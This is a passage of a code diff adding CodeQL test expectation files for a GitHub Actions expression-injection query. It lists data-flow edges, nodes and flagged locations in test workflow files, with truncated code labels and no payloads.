| job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref new file mode 100644 index 000000000000..1745587e534a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected new file mode 100644 index 000000000000..13c81bd08e0b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -0,0 +1,233 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | 